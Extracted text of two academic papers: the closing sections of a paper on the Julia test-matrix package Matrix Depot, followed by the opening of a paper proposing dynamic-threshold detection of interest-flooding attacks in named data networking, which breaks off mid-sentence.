3.0 > matrixdepot("tridiag", Int, 4) 4x4 Tridiagonal{Int64}: 2 -1 0 0 -1 2 -1 0 0 -1 2 -1 0 0 -1 2 Test problems for regularization methods A mathematical problem is ill-posed if the solution is not unique or if an arbitrarily small perturbation of the data can cause an arbitrarily large change in the solution. Regularization methods are an important class of methods for dealing with such problems (Hansen, 1998; Hansen, 2010). One means of generating test problems for regularization methods is to discretize a given ill-posed problem. Matrix Depot contains a group of regularization test problems derived from Hansen’s MATLAB Regularization Tools (Hansen, 1994; Hansen, 2007; Hansen, 2008) that are mostly discretizations of Fredholm integral equations of the first kind:∫ 1 0 K(s,t)f (t)dt =g(s), 0≤ s≤1. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 16/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 The regularization test problems form the group regprob. > matrixdepot("regprob") 12-element Array{ASCIIString,1}: "baart" "blur" "deriv2" "foxgood" "gravity" "heat" "parallax" "phillips" "shaw" "spikes" "ursell" "wing" Each problem is a linear system Ax =b where the matrix A and vectors x and b are obtained by discretization (using quadrature or the Galerkin method) of K , f , and g. By default, we generate only A, which is an ill-conditioned matrix. The whole test problem will be generated if the parameter matrixonly is set to false, and in this case the output has type RegProb, which is defined as immutable RegProb{T} A::AbstractMatrix{T} # matrix of interest b::AbstractVector{T} # right-hand side x::AbstractVector{T} # the solution to Ax = b end If r is a generated test problem, then r.A, r.b, and r.x are the matrix A and vectors x and b respectively. If the solution is not provided by the problem, the output is stored as type RegProbNoSolution, which is defined as immutable RegProbNoSolution{T} A::AbstractMatrix{T} # matrix of interest b::AbstractVector{T} # right-hand side end For example, the test problem wing can be generated as follows. > matrixdepot("wing") A Problem with a Discontinuous Solution ======================================= Input options: * [type,] dim, t1, t2, [matrixonly]: the dimension of matrix is dim. t1 and t2 are two real scalars such that 0 < t1 < t2 < 1. If matrixonly = false, the matrix A and vectors b and x in the linear system Ax = b will be generated(matrixonly = true by default). * [type,] n, [matrixonly]: t1 = 1/3 and t2 = 2/3. Groups: ["regprob"] Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 17/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 References: G. M. Wing, A Primer on Integral Equations of the First Kind, Society for Industrial and Applied Mathematics, 1991, p. 109. > A = matrixdepot("wing", 4) 4x4 Array{Float64,2}: 0.031189 0.0921165 0.148804 0.198786 0.0310674 0.0889342 0.134959 0.164156 0.0309463 0.085862 0.122403 0.13556 0.0308257 0.0828958 0.111014 0.111945 > r = matrixdepot("wing", 4, false) Test problems for Regularization Methods A: 4x4 Array{Float64,2}: 0.031189 0.0921165 0.148804 0.198786 0.0310674 0.0889342 0.134959 0.164156 0.0309463 0.085862 0.122403 0.13556 0.0308257 0.0828958 0.111014 0.111945 b: 4-element Array{Float64,1}: 0.0804953 0.0751385 0.0701787 0.0655842 x: 4-element Array{Float64,1}: 0.0 0.5 0.5 0.0 > r.x 4-element Array{Float64,1}: 0.0 0.5 0.5 0.0 Matrix data from external sources Matrix Depot provides access to matrices from Matrix Market (Boisvert et al., 1997) and the University of Florida Sparse Matrix Collection (Davis & Hu, 2011), both of which contain many matrices taken from applications. In particular, these sources contain many large, sparse matrices. Matrix Market and the University of Florida Sparse Matrix Collection both categorize matrices by application domain and the problem source and both provide matrices in Matrix Market Format (Boisvert, Pozo & Remington, 1996). These similarities allow us to design a generic interface for both collections. The symbol :get (or :g) is used for downloading matrices from both collections and the symbol :read (or :r) is used for reading in matrices already downloaded. Downloaded matrix data is stored on disk in the Matrix Market format and when read into Julia is stored in the type SparseMatrixCSC. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 18/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 MatrixDepot.update()downloads the matrix name data files from the two web servers. > MatrixDepot.update() \% Total \% Received \% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1887k 0 1887k 0 0 97337 0 --:--:-- 0:00:19 --:--:-- 472k \% Total \% Received \% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 41552 0 41552 0 0 4421 0 --:--:-- 0:00:09 --:--:-- 41018 The University of Florida Sparse Matrix Collection is divided into matrix groups and the group of a matrix forms part of the full name of the matrix (Davis & Hu, 2011). For example, the full name of the matrix 1138_bus in the Harwell-Boeing Collection is HB/1138_bus. > matrixdepot("HB/1138_bus", :get) \% Total \% Received \% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 19829 100 19829 0 0 2320 0 0:00:08 0:00:08 --:--:-- 49572 > matrixdepot("HB/1138_bus", :read) 1138x1138 Symmetric{Float64,SparseMatrixCSC{Float64,Int64}}: 1474.78 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 9.13665 0.0 0.0 0.0 0.0 0.0 0.0 0.0 69.6147 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 -9.01713 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 -3.40599 0.0 0.0 0.0 0.0 0.0 ... ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 -24.3902 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 26.5639 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 46.1767 0.0 0.0 0.0 0.0 0.0 0.0 0.0 10000.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 117.647 Matrices from the University of Florida Sparse Matrix Collection are stored in MatrixDepot/data/uf and they are stored by group (to avoid duplicate names), i.e., one directory per group. Similarly, matrices from Matrix Market are stored in MatrixDepot/data/mm. Both directories are untracked by Git. Many matrices in the University of Florida Sparse Matrix Collection contain problem-specific metadata, all of which is downloaded. The metadata is accessed by setting the keyword argument meta to true. Then instead of returning the matrix, Matrix Depot will return the metadata (including the matrix) as a dictionary. For example, the IMDB movie database Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 19/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 Pajek/IMDB has metadata related to actors and movies. The following command stores all the metadata of Pajek/IMDB in a variable r, where r["IMDB"] is the matrix. > r = matrixdepot("Pajek/IMDB", :r, meta = true) Dict{AbstractString,Any} with 8 entries: "IMDB_colname" => "’La Tata’ Castro, Maria Tereza\n’La Veneno’... "IMDB_MovieBacon" => 428440x1 Array{Float64,2} "IMDB_code" => "Drama\nShort\nDocumentary\nComedy\nWestern\nFamily... "IMDB_KevinBacon" => 1x1 Array{Float64,2} "IMDB_ActorBacon" => 896308x1 Array{Float64,2} "IMDB_category" => 428440x1 Array{Float64,2} "IMDB" => 428440x896308 sparse matrix with 3782463 Float64 entries "IMDB_year" => 428440x1 Array{Float64,2} We can download a whole group of matrices from the University of Florida sparse matrix collection using the command matrixdepot("group name/*", :get). The next example downloads all 67 matrices in the Gset group of matrices from random graphs (contributed by Y. Ye) then displays all the matrices in Matrix Depot, including the newly downloaded matrices. > matrixdepot("Gset/*", :get) Downloading all matrices in group Gset... \% Total \% Received \% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 48083 100 48083 0 0 95388 0 --:--:-- --:--:-- --:--:-- 96166 download:/home/weijian/.julia/v0.4/MatrixDepot/src/../data/uf/Gset/G1.tar.gz G1/G1.mtx \% Total \% Received \% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 55180 100 55180 0 0 75318 0 --:--:-- --:--:-- --:--:-- 75692 download:/home/weijian/.julia/v0.4/MatrixDepot/src/../data/uf/Gset/G10.tar.gz G10/G10.mtx \% Total \% Received \% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 5926 100 5926 0 0 23126 0 --:--:-- --:--:-- --:--:-- 23515 download:/home/weijian/.julia/v0.4/MatrixDepot/src/../data/uf/Gset/G11.tar.gz G11/G11.mtx \% Total \% Received \% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 6349 100 6349 0 0 24223 0 --:--:-- --:--:-- --:--:-- 24608 ... > matrixdepot() Matrices: 1) baart 2) binomial 3) blur 4) cauchy 5) chebspec 6) chow 7) circul 8) clement 9) companion 10) deriv2 11) dingdong 12) fiedler 13) forsythe 14) foxgood 15) frank 16) golub 17) gravity 18) grcar 19) hadamard 20) hankel 21) heat 22) hilb 23) invhilb 24) invol 25) kahan 26) kms 27) lehmer 28) lotkin 29) magic 30) minij 31) moler 32) neumann 33) oscillate 34) parallax 35) parter 36) pascal Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 20/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 37) pei 38) phillips 39) poisson 40) prolate 41) randcorr 42) rando 43) randsvd 44) rohess 45) rosser 46) sampling 47) shaw 48) spikes 49) toeplitz 50) tridiag 51) triw 52) ursell 53) vand 54) wathen 55) wilkinson 56) wing 57) Gset/G1 58) Gset/G10 59) Gset/G11 60) Gset/G12 61) Gset/G13 62) Gset/G14 63) Gset/G15 64) Gset/G16 65) Gset/G17 66) Gset/G18 67) Gset/G19 68) Gset/G2 69) Gset/G20 70) Gset/G21 71) Gset/G22 72) Gset/G23 73) Gset/G24 74) Gset/G25 75) Gset/G26 76) Gset/G27 77) Gset/G28 78) Gset/G29 79) Gset/G3 80) Gset/G30 81) Gset/G31 82) Gset/G32 83) Gset/G33 84) Gset/G34 85) Gset/G35 86) Gset/G36 87) Gset/G37 88) Gset/G38 89) Gset/G39 90) Gset/G4 91) Gset/G40 92) Gset/G41 93) Gset/G42 94) Gset/G43 95) Gset/G44 96) Gset/G45 97) Gset/G46 98) Gset/G47 99) Gset/G48 100) Gset/G49 101) Gset/G5 102) Gset/G50 103) Gset/G51 104) Gset/G52 105) Gset/G53 106) Gset/G54 107) Gset/G55 108) Gset/G56 109) Gset/G57 110) Gset/G58 111) Gset/G59 112) Gset/G6 113) Gset/G60 114) Gset/G61 115) Gset/G62 116) Gset/G63 117) Gset/G64 118) Gset/G65 119) Gset/G66 120) Gset/G67 121) Gset/G7 122) Gset/G8 123) Gset/G9 Groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric The full name of a matrix in Matrix Market comprises three parts: the collection name, the set name, and the matrix name. For example, the full name of the matrix BCSSTK14 in the set BCSSTRUC2 from the Harwell-Boeing Collection is Harwell-Boeing/bcsstruc2/bcsstk14. Note that both set name and matrix name are in lower case. > matrixdepot("Harwell-Boeing/bcsstruc2/bcsstk14", :get) \% Total \% Received \% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 292k 100 292k 0 0 22635 0 0:00:13 0:00:13 --:--:-- 61144 download:/home/weijian/.julia/v0.4/MatrixDepot/data/mm/Harwell-Boeing/bcsstruc2 /bcsstk14.mtx.gz > matrixdepot("Harwell-Boeing/bcsstruc2/bcsstk14", :read) 1806x1806 Symmetric{Float64,SparseMatrixCSC{Float64,Int64}}: 1.93161e6 0.0 -1.02166e5 ... 0.0 0.0 0.0 1.0 0.0 0.0 0.0 -1.02166e5 0.0 1.93147e6 0.0 0.0 -35568.9 0.0 1.65787e5 0.0 0.0 -1.06959e5 0.0 -1.06959e5 0.0 0.0 -1.65835e5 0.0 35568.9 ... 0.0 0.0 -717.845 0.0 0.0 0.0 0.0 0.0 0.0 88998.5 0.0 0.0 0.0 0.0 -1.82865e6 0.0 0.0 0.0 0.0 1.24988e5 0.0 0.0 ... ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 1.06103e7 -5.25151e5 0.0 0.0 0.0 -5.25151e5 -53434.0 Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 21/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 0.0 0.0 0.0 ... 1.06959e5 -1.65835e5 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 1.06959e5 35568.9 0.0 0.0 0.0 -816518.0 1.21311e7 0.0 0.0 0.0 4.55624e7 8.15266e5 0.0 0.0 0.0 ... 8.15266e5 5.27942e8 We recommend downloading matrices from the University of Florida Sparse Matrix Collection when there is a choice, because almost every matrix from Matrix Market is included in it. CONCLUDING REMARKS Matrix Depot follows in the footsteps of earlier collections of matrices. Its novelty is threefold. First, it is extensible by the user, and so can be adapted to the user’s needs. In doing so it facilitates experimentation, and in particular makes it easier to do reproducible research. Second, it combines several existing test matrix collections, namely Higham’s Test Matrix Toolbox, Hansen’s regularization problems, and the University of Florida Sparse Matrix Collection, in order to provide both parametrized test matrices and real-life sparse matrix data in a single framework. Third, it fully exploits the Julia language. It uses multiple dispatch to help provide a simple interface and, in particular, to allow matrices to be generated in any of the numeric data types supported by the language. Matrix Depot therefore anticipates the development of intrinsic support in Julia for computations with BigFloat and other data types. Matrix Depot has been in development since 2014. It is an open source project (https://github.com/weijianzhang/MatrixDepot.jl) hosted on GitHub and is available under the MIT License. A first release was announced in December 2014. Matrix Depot v0.5.5 is the latest official release and consists of around 3,000 lines of source code, with test coverage of 98.91% according to Codecov (https://codecov.io/). From GitHub traffic analytics, we learn that Matrix Depot has 40–70 unique downloads (unique cloners) every month. Matrix Depot also benefits the development of other Julia packages. LightGraphs (https://github.com/JuliaGraphs/LightGraphs.jl), an optimized graph package for Julia, for example, has embedded Matrix Depot as its database. We built Matrix Depot to facilitate the development and testing of matrix (and other) algorithms in Julia. and we will continue to develop Matrix Depot by introducing new test matrices and integrating other test collections. ACKNOWLEDGEMENTS The authors are grateful to Jiahao Chen (MIT), Stefan Güttel (The University of Manchester), and Tim Davis (Texas A & M University) for suggestions, and to Per Christian Hansen for allowing us to incorporate problems from Regularization Tools. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 22/25 https://peerj.com https://github.com/weijianzhang/MatrixDepot.jl https://codecov.io/ https://github.com/JuliaGraphs/LightGraphs.jl http://dx.doi.org/10.7717/peerj-cs.58 ADDITIONAL INFORMATION AND DECLARATIONS Funding The work of Higham was supported by European Research Council Advanced Grant MATFUN (267526) and Engineering and Physical Sciences Research Council grant EP/I01912X/1. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: European Research Council Advanced Grant MATFUN: 267526. Engineering and Physical Sciences Research Council grant: EP/I01912X/1. Competing Interests Nicholas J. Higham is an Academic Edtor for PeerJ Computer Science. Author Contributions • Weijian Zhang conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Nicholas J. Higham conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Matrix Depot: https://github.com/weijianzhang/MatrixDepot.jl. REFERENCES Bai Z, Day D, Demmel J, Dongarra J. 1997. A test matrix collection for non-Hermitian eigenvalue problems (release 1.0). Technical Report CS-97-355, Department of Computer Science. Knoxville: University of Tennessee, Knoxville. LAPACK Working Note 123, pp. 45. Betcke T, Higham NJ, Mehrmann V, Schröder C, Tisseur F. 2013. NLEVP: a collection of nonlinear eigenvalue problems. ACM Transactions on Mathematical Software 39(2): 7:1–7:28. Bezanson J, Edelman A, Karpinski S, Shah VB. 2014. Julia: a fresh approach to numeri- cal computing. ArXiv preprint. arXiv:1411.1607. Bezanson J, Karpinski S, Shah VB, Edelman A. 2012. Julia: a fast dynamic language for technical computing. ArXiv preprint. arXiv:1209.5145. Boisvert RF, Pozo R, Remington K, Barrett RF, Dongarra JJ. 1997. Matrix Market: a Web resource for test matrix collections. In: Boisvert RF, ed. Quality of numerical software: assessment and enhancement. London: Chapman and Hall, 125–136. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 23/25 https://peerj.com https://github.com/weijianzhang/MatrixDepot.jl http://arXiv.org/abs/1411.1607 http://arXiv.org/abs/1209.5145 http://dx.doi.org/10.7717/peerj-cs.58 Boisvert RF, Pozo R, Remington KA. 1996. The Matrix Market exchange formats: Initial design. Technical Report NISTIR 5935. Gaithersburg: National Institute of Standards and Technology, pp. 14. Clement PA. 1959. A class of triple-diagonal matrices for test purposes. SIAM Review 1(1):50–52 DOI 10.1137/1001006. Davis TA, Hu Y. 2011. The University of Florida Sparse Matrix Collection. ACM Transactions on Mathematical Software 38(1): 1:1–1:25. Available at http://www.cise. ufl.edu/research/sparse/matrices. Donoho DL, Stodden V. 2015. Reproducible research in the mathematical sciences. In: Higham NJ, Dennis MR, Glendinning P, Martin PA, Santosa F, Tanner J, eds. The Princeton companion to applied mathematics. Princeton: Princeton University Press, 916–925. Duff IS, Grimes RG, Lewis JG. 1989. Sparse matrix test problems. ACM Transactions on Mathematical Software 15(1):1–14 DOI 10.1145/62038.62043. Fousse L, Hanrot G, Lefèvre V, Pélissier P, Zimmermann P. 2007. MPFR: a multiple- precision binary floating-point library with correct rounding. ACM Transactions on Mathematical Software 33(2): 13:1–13:15. Gear CW. 1969. A simple set of test matrices for eigenvalue programs. Math. Comp. 23(105):119–125 DOI 10.1090/S0025-5718-1969-0238477-8. Gregory RT, Karney DL. 1969. A collection of matrices for testing computational al- gorithms. New York: Wiley. Reprinted with corrections by Robert E. Krieger, Huntington, New York, 1978. Hansen PC. 1994. Regularization Tools: a Matlab package for analysis and solution of discrete ill-posed problems. Numerical Algorithms 6(1):1–35 DOI 10.1007/BF02149761. Hansen PC. 1998. Rank-deficient and discrete ill-posed problems: numerical aspects of linear inversion. Philadelphia: Society for Industrial and Applied Mathematics, xvi+247 pp. Hansen PC. 2007. Regularization Tools version 4.0 for Matlab 7.3. Numer. Algorithms 46(2):189–194 DOI 10.1007/s11075-007-9136-9. Hansen PC. 2008. Regularization tools. A Matlab package for analysis and solution of discrete ill-posed problems. Version 4.1 for Matlab 7.3. Report, Information and Mathematics Modelling. Technical University of Denmark, DK-2800 Lyngby, Denmark. Hansen PC. 2010. Discrete inverse problems: insight and algorithms. Philadelphia: Society for Industrial and Applied Mathematics, xii+213 pp. Higham NJ. 1991. Algorithm 694: a collection of test matrices in MATLAB. ACM Transactions on Mathematical Software 17(3):289–305 DOI 10.1145/114697.116805. Higham NJ. 1995. The Test Matrix Toolbox for MATLAB (version 3.0). Numerical Analysis Report No. 276, Manchester Centre for Computational Mathematics. Manchester, England. Higham NJ. 2002. Accuracy and stability of numerical algorithms. second edition. Philadelphia: Society for Industrial and Applied Mathematics, xxx+680 pp. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 24/25 https://peerj.com http://dx.doi.org/10.1137/1001006 http://www.cise.ufl.edu/research/sparse/matrices http://www.cise.ufl.edu/research/sparse/matrices http://dx.doi.org/10.1145/62038.62043 http://dx.doi.org/10.1090/S0025-5718-1969-0238477-8 http://dx.doi.org/10.1007/BF02149761 http://dx.doi.org/10.1007/s11075-007-9136-9 http://dx.doi.org/10.1145/114697.116805 http://dx.doi.org/10.7717/peerj-cs.58 Marques OA, Vömel C, Demmel JW, Parlett BN. 2008. Algorithm 880: a testing infras- tructure for symmetric tridiagonal eigensolvers. ACM Transactions on Mathematical Software 35(1): 8:1–8:13. Pei ML. 1962. A test matrix for inversion procedures. Communications of the ACM 5(10):508 DOI 10.1145/1462173.1462175. Taylor A, Higham DJ. 2009. CONTEST: a controllable test matrix toolbox for MATLAB. ACM Transactions on Mathematical Software 35(4): 26:1–26:17. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 25/25 https://peerj.com http://dx.doi.org/10.1145/1462173.1462175 http://dx.doi.org/10.7717/peerj-cs.58 work_mu26domt6fcunj7gbzgeaw3ypi ---- Detection of malicious consumer interest packet with dynamic threshold values Detection of malicious consumer interest packet with dynamic threshold values Adnan Mahmood Qureshi1, Nadeem Anjum1, Rao Naveed Bin Rais2, Masood Ur-Rehman3 and Amir Qayyum1 1 Computer Science, Capital University of Science and Technology, Islamabad, Pakistan 2 College of Engineering and IT, Ajman University, Ajman, United Arab Emirates 3 James Watt School of Engineering, University of Glasgow, Glasgow, UK ABSTRACT As a promising next-generation network architecture, named data networking (NDN) supports name-based routing and in-network caching to retrieve content in an efficient, fast, and reliable manner. Most of the studies on NDN have proposed innovative and efficient caching mechanisms and retrieval of content via efficient routing. However, very few studies have targeted addressing the vulnerabilities in NDN architecture, which a malicious node can exploit to perform a content poisoning attack (CPA). This potentially results in polluting the in-network caches, the routing of content, and consequently isolates the legitimate content in the network. In the past, several efforts have been made to propose the mitigation strategies for the content poisoning attack, but to the best of our knowledge, no specific work has been done to address an emerging attack-surface in NDN, which we call an interest flooding attack. Handling this attack-surface can potentially make content poisoning attack mitigation schemes more effective, secure, and robust. Hence, in this article, we propose the addition of a security mechanism in the CPA mitigation scheme that is, Name-Key Based Forwarding and Multipath Forwarding Based Inband Probe, in which we block the malicious face of compromised consumers by monitoring the Cache-Miss Ratio values and the Queue Capacity at the Edge Routers. The malicious face is blocked when the cache-miss ratio hits the threshold value, which is adjusted dynamically through monitoring the cache-miss ratio and queue capacity values. The experimental results show that we are successful in mitigating the vulnerability of the CPA mitigation scheme by detecting and blocking the flooding interface, at the cost of very little verification overhead at the NDN Routers. Subjects Computer Networks and Communications, Emerging Technologies, Security and Privacy Keywords Content poisoning attacks, Named data networking, Maliciousconsumer interestpacket, Mitigation techniques, Dynamic threshold INTRODUCTION Named Data Networking (NDN) is a well-known and well-researched architecture for the next generation of the Internet, based on a data-centric approach. While the legacy network is based on a host-centric system, the NDN architecture has changed the Internet’s communication model altogether (Jacobson et al., 2009). It allows the distribution of data that can be acquired from any content router from the network. How to cite this article Qureshi AM, Anjum N, Rais RNB, Ur-Rehman M, Qayyum A. 2021. Detection of malicious consumer interest packet with dynamic threshold values. PeerJ Comput. Sci. 7:e435 DOI 10.7717/peerj-cs.435 Submitted 6 November 2020 Accepted 17 February 2021 Published 17 March 2021 Corresponding author Nadeem Anjum, nadeem.anjum@cust.edu.pk Academic editor Vicente Alarcon-Aquino Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.435 Copyright 2021 Qureshi et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.435 mailto:nadeem.�anjum@�cust.�edu.�pk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.435 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ A content provider can produce the data in advance and place it as auxiliary storage that can be accessed by any consumer anytime, even if the producer gets offline. A producer does not have to be online, and a consumer does not have to be connected to the producer to fetch the data; Instead, the consumer can acquire data through in-networking caches. While NDN increases content availability in the network via in-network caching, the integrity of content becomes critical, given NDN’s nature (Tarkoma, Ain & Visala, 2009). Hence, NDN opens several security-related issues that are not relevant to the legacy network communication. It includes some new types of data integrity attacks where a malicious or compromised node provides a corrupted copy of the content. These issues are often ignored in NDN-related communication and caching mechanisms and are our main focus in the article. One of the most critical attack vectors in NDN is the Content Poisoning Attack. The attacker compromises the Content Router (CR), and this compromised CR sends a reply to the legit request with totally bogus or corrupted content. This poisoned content pollutes the in-network caches of intermediate NDN routers and thus deprives the consumers of the requested content’s legitimate copy. Hu et al. (2018) proposed a comprehensive scheme to mitigate the Content Poisoning Attack (CPA). A special interest packet is generated by the consumer, which contains the hash of the poisoned data. This article is all about the identification and mitigation of security flaws that can be exploited by the attacker during this CPA mitigation process. The research problem lies in the CPA mitigation scheme proposed by Hu et al. (2018). A consumer with malicious intent can flood the network with the Interest packet containing the hash digest of legit or un-poisoned data. This hash is stored in its exclude filter field. During CPA mitigation, this packet can flood the network, which will enable multipath forwarding and on-demand verification of hash at the router. This flooding attack can severely affect the throughput of the network or even cause a denial of service for other legitimate consumers. Therefore, it is essential to mitigate and add this additional security feature along with CPA mitigation (Qureshi & Anjum, 2020). In this article, we proposed a scheme to detect the flooding attack generated by the compromised Consumer. A satisfaction test is performed to check if the excluded interest packet is non-existent in the cache or a legit packet. If the cache miss ratio (of the excluded interest packet) reaches the threshold value, it is considered an attack. A lightweight parameter is added to the Content Store data structure, which stores cache miss counter value. This value is compared with the specified threshold value. When the cache miss counter reaches near that threshold value, an event is raised that blocks the incoming malicious face. Also, in our scheme, we made the threshold value adaptable. At first, the initial threshold value is calculated by taking the total buffer size and divided it by the verification rate. The proposed idea is that when cache miss ratio avg crosses 50%, and queue capacity saturates, the threshold value is reduced to half. This process continues until the value is thrashed to one. Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 2/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ The articles’s main contribution is the addition of a security feature that fills up the attack surface that can be exploited by the malicious consumer. Our contributions are: � Adjustment of the threshold value dynamically by monitoring the cache-miss ratio value and queue capacity. � Detection and mitigation of the flooding attack of special interest packets generated while mitigating the content poisoning attack. Further, this article is organized into five sections; the second section emphasizes the literature review and related work. The third section is the proposed approach, and in the fourth section, experiments and results are highlighted along with the conclusion in the fifth section. RELATED WORK Any network’s primary goal is to share web content, including photographs, texts, and videos. Implementing security standards and goals such as confidentiality, integrity, and accessibility can ensure robust and flawless communication. Privacy guarantees that only the approved individual shall access the data. Integrity means that the receiver’s received data must be similar to the one sent by the sender. Availability ensures that network infrastructure should be available for an authorized user whenever he needs the service (Wein et al., 2007). Kumar et al. (2019) and Hassanein & Zulkernine (2015) explained some of the most common attacks within the existing TCP/IP model such as Denial of Service (DoS) attack, Distributed Denial of Service (DDoS) attack, eavesdropping (snooping), masquerading, TCP Replay Attack, Man in the Middle Attack, repudiation, and traffic analysis attack. These legacy attacks are not possible in NDN because of the absence of the host, but with the advent of this new architecture, some new attack surfaces have emerged which need to be addressed and it is an active research area. NDN’s data-centric security and security issues in NDN At the network layer of NDN, data-centric security is mandated via a digital signature on each data packet. A digital signature is added by the content provider (producer) to every data packet associating the data to the packet name when data is being generated. Authentication can be performed by the consumer on the data packet by verifying the signature using the Content Providers’ public key. This authentication can be performed even if the data is retrieved from some other entity other than the content provider (Ribeiro et al., 2016). Zhang et al. (2018) stated that If a content providers’ public key is not distributed or the consumer has no information about this public key, in that case, the data producer places the signing key name into the specific field of the data packet. It is known as the KeyLocator field. A consumer can acquire a public key by following this field of KeyLocator and can retrieve it just like a normal data packet. Kumar et al. (2019) explained some of the most common attacks within the existing TCP/IP model such as Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 3/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Denial of Service (DoS) attack, Distributed Denial of Service (DDoS) attack, eavesdropping (snooping), masquerading, TCP Replay Attack, Man in the Middle Attack, repudiation, and traffic analysis attack. In a modification attack, the attacker does not only compromise the confidentiality of the data by accessing it but also compromises the integrity of the data by trying to alter it. However, this attack is not possible in NDN, because each piece of data is signed by the publisher, which the consumer can verify. However, if the router itself is compromised and alters the data packet, then a corrupted data packet may be sent to the consumer. Consumers after receiving the publishers’ public key can validate this corrupted data. In a masquerading attack, the attacker masks his identity and impersonates to be another person so he/she can acquire some useful information about that person. However, this attack is also not possible in NDN because every piece of data chunk is signed by the publisher using his/her private key. In a replay attack, the attacker performs Man in the Middle attack and tries to get a copy of the message from the sender, then after modifying the message and he/she sends it to the receiver. The recipient assumes that the actual sender has forwarded the message but in fact, it is the modified message from the attacker with malicious intent. This type of attack is also not possible in NDN because the interest packet is identified by the name and for the uniqueness of the namespace in the network, a nonce is used. When the same interest packet reaches the router (with the same name and nonce), the router assumes the packet is duplicate and it is replayed; it will, therefore, be purged from the PIT table. NDN, therefore, protects itself at the network layer level from the replay attack. In NDN architecture, some inherent security features protect us from some of the legacy security attacks by default but still there are some emerging security concerns in this new architecture that needs to be addressed. Security, privacy, and access control are the three major domains that need to be covered in NDN architecture. Several attacks are possible in NDN such as Content Poisoning attack, Content pollution attack, Naming Attack, and Denial of Service attack. In privacy, it can be classified into five categories such as content privacy, signature privacy, client privacy, name privacy, and cache privacy (Wein et al., 2007; Ahlgren et al., 2012; Zhang et al., 2018; Hassanein & Zulkernine, 2015). In access control, there is some mechanism that needs to be addressed are content encryption, content attributes, clients’ identity, and authorized sessions. Table 1 NDN attack types. Attack types Adversary Victim Compromised security goal NDN element involved in attack Flooding attack of interest packet Consumer Consumer/ Router/Producer Availability PIT Cache pollution attack Consumer Consumer Availability CS Privacy attack Consumer Consumer Confidentiality CS Content poisoning attack Producer or Router Consumer/Router Integrity/Availability CS Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 4/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Attack types in NDN In NDN there are four main types of security threats that are briefly discussed in the coming sections and the attack effects on the security goals are mentioned in Table 1 (Kumar et al., 2019; Tourani et al., 2018). Foodig attack of interest packet Benmoussa et al. (2020, 2019) explained in details the effects of an interest flooding attack, in which, an attacker can deplete the network resources by flooding the network with a large number of interest packets batches. PIT, network bandwidth, and producer resources availability to the legit users will be compromised with this attack. This attack consumes NDN resources that restrict legitimate users from accessing them. Cache pollution attack Wang et al. (2017) discussed the anatomy of cache pollution attack, the attacker attempts to fill the cache with unwanted content in the NDN router by demanding the data packets which are unpopular and not in demand. As a result, the NDN routers’ impact ratio decreases. Therefore, the cache hit ratio of the interest packet 